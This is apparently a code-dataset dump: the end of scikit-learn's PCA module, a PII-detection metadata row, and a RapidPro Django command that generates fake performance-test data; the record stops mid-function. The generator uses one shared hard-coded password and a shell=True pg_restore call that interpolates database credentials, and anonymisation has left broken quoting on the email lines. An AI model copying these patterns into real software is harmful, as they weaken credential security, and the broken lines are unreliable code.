ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2.
return ll
def _infer_dimension_(spectrum, n_samples, n_features):
""""""Infers the dimension of a dataset of shape (n_samples, n_features)
The dataset is described by its spectrum `spectrum`.
""""""
n_spectrum = len(spectrum)
ll = np.empty(n_spectrum)
for rank in range(n_spectrum):
ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features)
return ll.argmax()
class PCA(BaseEstimator, TransformerMixin):
""""""Principal component analysis (PCA)
Linear dimensionality reduction using Singular Value Decomposition of the
data and keeping only the most significant singular vectors to project the
data to a lower dimensional space.
This implementation uses the scipy.linalg implementation of the singular
value decomposition. It only works for dense arrays and is not scalable to
large dimensional data.
The time complexity of this implementation is ``O(n ** 3)`` assuming
n ~ n_samples ~ n_features.
Parameters
----------
n_components : int, None or string
Number of components to keep.
if n_components is not set all components are kept::
n_components == min(n_samples, n_features)
if n_components == 'mle', Minka\'s MLE is used to guess the dimension
if ``0 < n_components < 1``, select the number of components such that
the amount of variance that needs to be explained is greater than the
percentage specified by n_components
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by n_samples times singular values to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making there data respect some hard-wired assumptions.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components. \
k is not set then all components are stored and the sum of explained \
variances is equal to 1.0
`n_components_` : int
The estimated number of components. Relevant when n_components is set
to 'mle' or a number between 0 and 1 to select using explained
variance.
Notes
-----
For n_components='mle', this class uses the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
Due to implementation subtleties of the Singular Value Decomposition (SVD),
which is used in this implementation, running fit twice on the same matrix
can lead to principal components with signs flipped (change in direction).
For this reason, it is important to always use the same estimator object to
transform data in a consistent fashion.
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import PCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = PCA(n_components=2)
>>> pca.fit(X)
PCA(copy=True, n_components=2, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
ProbabilisticPCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
""""""
def __init__(self, n_components=None, copy=True, whiten=False):
self.n_components = n_components
self.copy = copy
self.whiten = whiten
def fit(self, X, y=None):
""""""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
""""""
self._fit(X)
return self
def fit_transform(self, X, y=None):
""""""Fit the model with X and apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
""""""
U, S, V = self._fit(X)
U = U[:, :self.n_components_]
if self.whiten:
# X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples)
U *= sqrt(X.shape[0])
else:
# X_new = X * V = U * S * V^T * V = U * S
U *= S[:self.n_components_]
return U
def _fit(self, X):
"""""" Fit the model on X
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
U, s, V : ndarrays
The SVD of the input data, copied and centered when
requested.
""""""
X = array2d(X)
n_samples, n_features = X.shape
X = as_float_array(X, copy=self.copy)
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
U, S, V = linalg.svd(X, full_matrices=False)
self.explained_variance_ = (S ** 2) / n_samples
self.explained_variance_ratio_ = (self.explained_variance_ /
self.explained_variance_.sum())
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
n_components = self.n_components
if n_components is None:
n_components = n_features
elif n_components == 'mle':
if n_samples < n_features:
raise ValueError(""n_components='mle' is only supported ""
""if n_samples >= n_features"")
n_components = _infer_dimension_(self.explained_variance_,
n_samples, n_features)
if 0 < n_components < 1.0:
# number of components for which the cumulated explained variance
# percentage is superior to the desired threshold
ratio_cumsum = self.explained_variance_ratio_.cumsum()
n_components = np.sum(ratio_cumsum < n_components) + 1
self.components_ = self.components_[:n_components, :]
self.explained_variance_ = \
self.explained_variance_[:n_components]
self.explained_variance_ratio_ = \
self.explained_variance_ratio_[:n_components]
self.n_components_ = n_components
return (U, S, V)
def transform(self, X):
""""""Apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
""""""
X = array2d(X)
if self.mean_ is not None:
X = X - self.mean_
X_transformed = fast_dot(X, self.components_.T)
return X_transformed
def inverse_transform(self, X):
""""""Transform data back to its original space, i.e.,
return an input X_original whose transform would be X
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation as transform.
""""""
return fast_dot(X, self.components_) + self.mean_
class ProbabilisticPCA(PCA):
""""""Additional layer on top of PCA that adds a probabilistic evaluation""""""
__doc__ += PCA.__doc__
def fit(self, X, y=None, homoscedastic=True):
""""""Additionally to PCA.fit, learns a covariance model
Parameters
----------
X : array of shape(n_samples, n_features)
The data to fit
homoscedastic : bool, optional,
If True, average variance across remaining dimensions
""""""
PCA.fit(self, X)
n_samples, n_features = X.shape
self._dim = n_features
Xr = X - self.mean_
Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_)
n_components = self.n_components
if n_components is None:
n_components = n_features
# Make the low rank part of the estimated covariance
self.covariance_ = np.dot(self.components_[:n_components].T *
self.explained_variance_[:n_components],
self.components_[:n_components])
if n_features == n_components:
delta = 0.
elif homoscedastic:
delta = (Xr ** 2).sum() / (n_samples * n_features)
else:
delta = (Xr ** 2).mean(axis=0) / (n_features - n_components)
# Add delta to the diagonal without extra allocation
self.covariance_.flat[::n_features + 1] += delta
return self
def score(self, X, y=None):
""""""Return a score associated to new data
Parameters
----------
X: array of shape(n_samples, n_features)
The data to test
Returns
-------
ll: array of shape (n_samples),
log-likelihood of each row of X under the current model
""""""
Xr = X - self.mean_
n_features = X.shape[1]
log_like = np.zeros(X.shape[0])
self.precision_ = linalg.inv(self.covariance_)
log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1)
log_like -= .5 * (fast_logdet(self.covariance_)
+ n_features * log(2. * np.pi))
return log_like
class RandomizedPCA(BaseEstimator, TransformerMixin):
""""""Principal component analysis (PCA) using randomized SVD
Linear dimensionality reduction using approximated Singular Value
Decomposition of the data and keeping only the most significant
singular vectors to project the data to a lower dimensional space.
Parameters
----------
n_components : int, optional
Maximum number of components to keep. When not given or None, this
is set to n_features (the second dimension of the training data).
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
iterated_power : int, optional
Number of iterations for the power method. 3 by default.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by the singular values to ensure uncorrelated outputs with unit
component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making their data respect some hard-wired assumptions.
random_state : int or RandomState instance or None (default)
Pseudo Random Number generator seed control. If None, use the
numpy.random singleton.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components. \
k is not set then all components are stored and the sum of explained \
variances is equal to 1.0
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import RandomizedPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = RandomizedPCA(n_components=2)
>>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
RandomizedPCA(copy=True, iterated_power=3, n_components=2,
random_state=None, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
PCA
ProbabilisticPCA
TruncatedSVD
References
----------
.. [Halko2009] `Finding structure with randomness: Stochastic algorithms
for constructing approximate matrix decompositions Halko, et al., 2009
(arXiv:909)`
.. [MRT] `A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`
Notes
-----
This class supports sparse matrix input for backward compatibility, but
actually computes a truncated SVD instead of a PCA in that case (i.e. no
centering is performed). This support is deprecated; use the class
TruncatedSVD for sparse matrix support.
""""""
def __init__(self, n_components=None, copy=True, iterated_power=3,
whiten=False, random_state=None):
self.n_components = n_components
self.copy = copy
self.iterated_power = iterated_power
self.whiten = whiten
self.mean_ = None
self.random_state = random_state
def fit(self, X, y=None):
""""""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
""""""
self._fit(X)
return self
def _fit(self, X):
""""""Fit the model to the data X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
X : ndarray, shape (n_samples, n_features)
The input data, copied, centered and whitened when requested.
""""""
random_state = check_random_state(self.random_state)
if hasattr(X, 'todense'):
warnings.warn(""Sparse matrix support is deprecated""
"" and will be dropped in 0.16.""
"" Use TruncatedSVD instead."",
DeprecationWarning)
else:
# not a sparse matrix, ensure this is a 2D array
X = np.atleast_2d(as_float_array(X, copy=self.copy))
n_samples = X.shape[0]
if not hasattr(X, 'todense'):
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U, S, V = randomized_svd(X, n_components,
n_iter=self.iterated_power,
random_state=random_state)
self.explained_variance_ = exp_var = (S ** 2) / n_samples
self.explained_variance_ratio_ = exp_var / exp_var.sum()
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
return X
def transform(self, X, y=None):
""""""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
""""""
# XXX remove scipy.sparse support here in 0.16
X = atleast2d_or_csr(X)
if self.mean_ is not None:
X = X - self.mean_
X = safe_sparse_dot(X, self.components_.T)
return X
def fit_transform(self, X, y=None):
""""""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
""""""
X = self._fit(atleast2d_or_csr(X))
X = safe_sparse_dot(X, self.components_.T)
return X
def inverse_transform(self, X, y=None):
""""""Transform data back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples in the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation of transform.
""""""
# XXX remove scipy.sparse support here in 0.16
X_original = safe_sparse_dot(X, self.components_)
if self.mean_ is not None:
X_original = X_original + self.mean_
return X_original
",20495,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alexandre Gramfort'], ['PERSON', 'Olivier Grisel'], ['LOCATION', 'n_samples'], ['PERSON', 'Thomas P. Minka'], ['LOCATION', 'log(2'], ['LOCATION', 'log(2'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['PERSON', 'n_components'], ['PERSON', 'Thomas P. Minka'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'log(2'], ['LOCATION', 'n_components'], ['DATE_TIME', '2009'], ['PERSON', 'Gunnar Martinsson'], ['PERSON', 'Vladimir Rokhlin'], ['PERSON', 'Mark Tygert'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'randomized_svd(X'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '..ba'], ['URL', 'np.su'], ['URL', 'np.su'], ['URL', 'spectrum.co'], ['URL', 'll.ar'], ['URL', 'scipy.li'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'linalg.sv'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'np.su'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'PCA.fi'], ['URL', 'PCA.fi'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.pr'], ['URL', 'linalg.in'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.pr'], ['URL', 'self.co'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'self.it'], ['URL', 'self.me'], ['URL', 'np.at'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'self.it'], ['URL', 'var.su'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me']]"
86,"from __future__ import unicode_literals, division, print_function
import json
import math
import pytz
import random
import resource
import six
import sys
import time
import uuid
from collections import defaultdict
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import User
from django.core.management import BaseCommand, CommandError
from django.core.management.base import CommandParser
from django.db import connection, transaction
from django.utils import timezone
from django_redis import get_redis_connection
from subprocess import check_call, CalledProcessError
from temba.channels.models import Channel
from temba.channels.tasks import squash_channelcounts
from temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME
from temba.flows.models import FlowStart, FlowRun
from temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages
from temba.locations.models import AdminBoundary
from temba.msgs.models import Label, Msg
from temba.msgs.tasks import squash_labelcounts
from temba.orgs.models import Org
from temba.orgs.tasks import squash_topupcredits
from temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms
from temba.values.models import Value
# maximum age in days of database content
CONTENT_AGE = 3 * 365
# every user will have this password including the superuser
USER_PASSWORD = ""Qwerty123""
# database dump containing admin boundary records
LOCATIONS_DUMP = 'test-data/nigeria.bin'
# organization names are generated from these components
ORG_NAMES = (
(""UNICEF"", ""WHO"", ""WFP"", ""UNESCO"", ""UNHCR"", ""UNITAR"", ""FAO"", ""UNEP"", ""UNAIDS"", ""UNDAF""),
(""Nigeria"", ""Chile"", ""Indonesia"", ""Rwanda"", ""Mexico"", ""Zambia"", ""India"", ""Brazil"", ""Sudan"", ""Mozambique"")
)
# the users, channels, groups, labels and fields to create for each organization
USERS = (
{'username': ""admin%d"", 'email': dummy@email.com"", 'role': 'administrators'},
{'username': ""editor%d"", 'email': dummy@email.com"", 'role': 'editors'},
{'username': ""viewer%d"", 'email': dummy@email.com"", 'role': 'viewers'},
{'username': ""surveyor%d"", 'email': dummy@email.com"", 'role': 'surveyors'},
)
CHANNELS = (
{'name': ""Android"", 'channel_type': Channel.TYPE_ANDROID, 'scheme': 'tel', 'address': ""1234""},
{'name': ""Nexmo"", 'channel_type': Channel.TYPE_NEXMO, 'scheme': 'tel', 'address': ""2345""},
{'name': ""Twitter"", 'channel_type': 'TT', 'scheme': 'twitter', 'address': ""my_handle""},
)
FIELDS = (
{'key': 'gender', 'label': ""Gender"", 'value_type': Value.TYPE_TEXT},
{'key': 'age', 'label': ""Age"", 'value_type': Value.TYPE_DECIMAL},
{'key': 'joined', 'label': ""Joined On"", 'value_type': Value.TYPE_DATETIME},
{'key': 'ward', 'label': ""Ward"", 'value_type': Value.TYPE_WARD},
{'key': 'district', 'label': ""District"", 'value_type': Value.TYPE_DISTRICT},
{'key': 'state', 'label': ""State"", 'value_type': Value.TYPE_STATE},
)
GROUPS = (
{'name': ""Reporters"", 'query': None, 'member': 0.95}, # member is either a probability or callable
{'name': ""Farmers"", 'query': None, 'member': 0.5},
{'name': ""Doctors"", 'query': None, 'member': 0.4},
{'name': ""Teachers"", 'query': None, 'member': 0.3},
{'name': ""Drivers"", 'query': None, 'member': 0.2},
{'name': ""Testers"", 'query': None, 'member': 0.1},
{'name': ""Empty"", 'query': None, 'member': 0.0},
{'name': ""Youth (Dynamic)"", 'query': 'age <= 18', 'member': lambda c: c['age'] and c['age'] <= 18},
{'name': ""Unregistered (Dynamic)"", 'query': 'joined = """"', 'member': lambda c: not c['joined']},
{'name': ""Districts (Dynamic)"", 'query': 'district=Faskari or district=Zuru or district=Anka',
'member': lambda c: c['district'] and c['district'].name in (""Faskari"", ""Zuru"", ""Anka"")},
)
LABELS = (""Reporting"", ""Testing"", ""Youth"", ""Farming"", ""Health"", ""Education"", ""Trade"", ""Driving"", ""Building"", ""Spam"")
FLOWS = (
{'name': ""Favorites"", 'file': ""favorites.json"", 'templates': (
[""blue"", ""mutzig"", ""bob""],
[""orange"", ""green"", ""primus"", ""jeb""],
)},
{'name': ""SMS Form"", 'file': ""sms_form.json"", 'templates': ([""22 F Seattle""], [""35 M MIAMI""])},
{'name': ""Pick a Number"", 'file': ""pick_a_number.json"", 'templates': ([""1""], [""4""], [""5""], [""7""], [""8""])}
)
# contact names are generated from these components
CONTACT_NAMES = (
("""", ""Anne"", ""Bob"", ""Cathy"", ""Dave"", ""Evan"", ""Freda"", ""George"", ""Hallie"", ""Igor""),
("""", ""Jameson"", ""Kardashian"", ""Lopez"", ""Mooney"", ""Newman"", ""O'Shea"", ""Poots"", ""Quincy"", ""Roberts""),
)
CONTACT_LANGS = (None, ""eng"", ""fre"", ""spa"", ""kin"")
CONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number
CONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle
CONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped
CONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked
CONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted
CONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact
RUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to
INBOX_MESSAGES = ((""What is"", ""I like"", ""No""), (""beer"", ""tea"", ""coffee""), (""thank you"", ""please"", ""today""))
class Command(BaseCommand):
COMMAND_GENERATE = 'generate'
COMMAND_SIMULATE = 'simulate'
help = ""Generates a database suitable for performance testing""
def add_arguments(self, parser):
cmd = self
subparsers = parser.add_subparsers(dest='command', help='Command to perform',
parser_class=lambda **kw: CommandParser(cmd, **kw))
gen_parser = subparsers.add_parser('generate', help='Generates a clean testing database')
gen_parser.add_argument('--orgs', type=int, action='store', dest='num_orgs', default=100)
gen_parser.add_argument('--contacts', type=int, action='store', dest='num_contacts', default=1000000)
gen_parser.add_argument('--seed', type=int, action='store', dest='seed', default=None)
sim_parser = subparsers.add_parser('simulate', help='Simulates activity on an existing database')
sim_parser.add_argument('--runs', type=int, action='store', dest='num_runs', default=500)
def handle(self, command, *args, **kwargs):
start = time.time()
if command == self.COMMAND_GENERATE:
self.handle_generate(kwargs['num_orgs'], kwargs['num_contacts'], kwargs['seed'])
else:
self.handle_simulate(kwargs['num_runs'])
time_taken = time.time() - start
self._log(""Completed in %d secs, peak memory usage: %d MiB\n"" % (int(time_taken), int(self.peak_memory())))
def handle_generate(self, num_orgs, num_contacts, seed):
""""""
Creates a clean database
""""""
seed = self.configure_random(num_orgs, seed)
self._log(""Generating random base database (seed=%d)...\n"" % seed)
try:
has_data = Org.objects.exists()
except Exception: # pragma: no cover
raise CommandError(""Run migrate command first to create database tables"")
if has_data:
raise CommandError(""Can't generate content in non-empty database."")
self.batch_size = 5000
# the timespan being modelled by this database
self.db_ends_on = timezone.now()
self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE)
# this is a new database so clear out redis
self._log(""Clearing out Redis cache... "")
r = get_redis_connection()
r.flushdb()
self._log(self.style.SUCCESS(""OK"") + '\n')
superuser = User.objects.create_superuser(""root"", dummy@email.com"", USER_PASSWORD)
country, locations = self.load_locations(LOCATIONS_DUMP)
orgs = self.create_orgs(superuser, country, num_orgs)
self.create_users(orgs)
self.create_channels(orgs)
self.create_fields(orgs)
self.create_groups(orgs)
self.create_labels(orgs)
self.create_flows(orgs)
self.create_contacts(orgs, locations, num_contacts)
def handle_simulate(self, num_runs):
""""""
Prepares to resume simulating flow activity on an existing database
""""""
self._log(""Resuming flow activity simulation on existing database...\n"")
orgs = list(Org.objects.order_by('id'))
if not orgs:
raise CommandError(""Can't simulate activity on an empty database"")
self.configure_random(len(orgs))
# in real life Nexmo messages are throttled, but that's not necessary for this simulation
del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO]['max_tps']
inputs_by_flow_name = {f['name']: f['templates'] for f in FLOWS}
self._log(""Preparing existing orgs... "")
for org in orgs:
flows = list(org.flows.order_by('id'))
for flow in flows:
flow.input_templates = inputs_by_flow_name[flow.name]
org.cache = {
'users': list(org.get_org_users().order_by('id')),
'channels': list(org.channels.order_by('id')),
'groups': list(ContactGroup.user_groups.filter(org=org).order_by('id')),
'flows': flows,
'contacts': list(org.org_contacts.values_list('id', flat=True)), # only ids to save memory
'activity': None
}
self._log(self.style.SUCCESS(""OK"") + '\n')
self.simulate_activity(orgs, num_runs)
def configure_random(self, num_orgs, seed=None):
if not seed:
seed = random.randrange(0, 65536)
self.random = random.Random(seed)
# monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101
from temba.utils import models
models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62)))
# We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a
# bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be
# allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content:
self.org_bias = math.log(1.0 / num_orgs, 0.5)
return seed
def load_locations(self, path):
""""""
Loads admin boundary records from the given dump of that table
""""""
self._log(""Loading locations from %s... "" % path)
# load dump into current db with pg_restore
db_config = settings.DATABASES['default']
try:
check_call('export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s' %
(db_config['PASSWORD'], db_config['USER'], db_config['NAME'], path), shell=True)
except CalledProcessError: # pragma: no cover
raise CommandError(""Error occurred whilst calling pg_restore to load locations dump"")
# fetch as tuples of (WARD, DISTRICT, STATE)
wards = AdminBoundary.objects.filter(level=3).prefetch_related('parent', 'parent__parent')
locations = [(w, w.parent, w.parent.parent) for w in wards]
country = AdminBoundary.objects.filter(level=0).get()
self._log(self.style.SUCCESS(""OK"") + '\n')
return country, locations
def create_orgs(self, superuser, country, num_total):
""""""
Creates and initializes the orgs
""""""
self._log(""Creating %d orgs... "" % num_total)
org_names = ['%s %s' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]]
self.random.shuffle(org_names)
orgs = []
for o in range(num_total):
orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones),
brand='rapidpro.io', country=country,
created_on=self.db_begins_on, created_by=superuser, modified_by=superuser))
Org.objects.bulk_create(orgs)
orgs = list(Org.objects.order_by('id'))
self._log(self.style.SUCCESS(""OK"") + ""\nInitializing orgs... "")
for o, org in enumerate(orgs):
org.initialize(topup_size=max((1000 - o), 1) * 1000)
# we'll cache some metadata on each org as it's created to save re-fetching things
org.cache = {
'users': [],
'fields': {},
'groups': [],
'system_groups': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)},
}
self._log(self.style.SUCCESS(""OK"") + '\n')
return orgs
def create_users(self, orgs):
""""""
Creates a user of each type for each org
""""""
self._log(""Creating %d users... "" % (len(orgs) * len(USERS)))
# create users for each org
for org in orgs:
for u in USERS:
user = User.objects.create_user(u['username'] % org.id, u['email'] % org.id, USER_PASSWORD)
getattr(org, u['role']).add(user)
user.set_org(org)
org.cache['users'].append(user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_channels(self, orgs):
""""""
Creates the channels for each org
""""""
self._log(""Creating %d channels... "" % (len(orgs) * len(CHANNELS)))
for org in orgs:
user = org.cache['users'][0]
for c in CHANNELS:
Channel.objects.create(org=org, name=c['name'], channel_type=c['channel_type'],
address=c['address'], schemes=[c['scheme']],
created_by=user, modified_by=user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_fields(self, orgs):
""""""
Creates the contact fields for each org
""""""
self._log(""Creating %d fields... "" % (len(orgs) * len(FIELDS)))
for org in orgs:
user = org.cache['users'][0]
for f in FIELDS:
field = ContactField.objects.create(org=org, key=f['key'], label=f['label'],
value_type=f['value_type'], show_in_table=True,
created_by=user, modified_by=user)
org.cache['fields'][f['key']] = field
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_groups(self, orgs):
""""""
Creates the contact groups for each org
""""""
self._log(""Creating %d groups... "" % (len(orgs) * len(GROUPS)))
for org in orgs:
user = org.cache['users'][0]
for g in GROUPS:
if g['query']:
group = ContactGroup.create_dynamic(org, user, g['name'], g['query'])
else:
group = ContactGroup.user_groups.create(org=org, name=g['name'], created_by=user, modified_by=user)
group.member = g['member']
group.count = 0
org.cache['groups'].append(group)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_labels(self, orgs):
""""""
Creates the message labels for each org
""""""
self._log(""Creating %d labels... "" % (len(orgs) * len(LABELS)))
for org in orgs:
user = org.cache['users'][0]
for name in LABELS:
Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_flows(self, orgs):
""""""
Creates the flows for each org
""""""
self._log(""Creating %d flows... "" % (len(orgs) * len(FLOWS)))
for org in orgs:
user = org.cache['users'][0]
for f in FLOWS:
with open('media/test_flows/' + f['file'], 'r') as flow_file:
org.import_app(json.load(flow_file), user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_contacts(self, orgs, locations, num_contacts):
""""""
Creates test and regular contacts for this database. Returns tuples of org, contact id and the preferred urn
id to avoid trying to hold all contact and URN objects in memory.
""""""
group_counts = defaultdict(int)
self._log(""Creating %d test contacts..."" % (len(orgs) * len(USERS)))
for org in orgs:
test_contacts = []
for user in org.cache['users']:
test_contacts.append(Contact.get_test_contact(user))
org.cache['test_contacts'] = test_contacts
self._log(self.style.SUCCESS(""OK"") + '\n')
self._log(""Creating %d regular contacts...\n"" % num_contacts)
# disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed
# count row for every contact
with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through):
names = [('%s %s' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]]
names = [n if n else None for n in names]
batch_num = 1
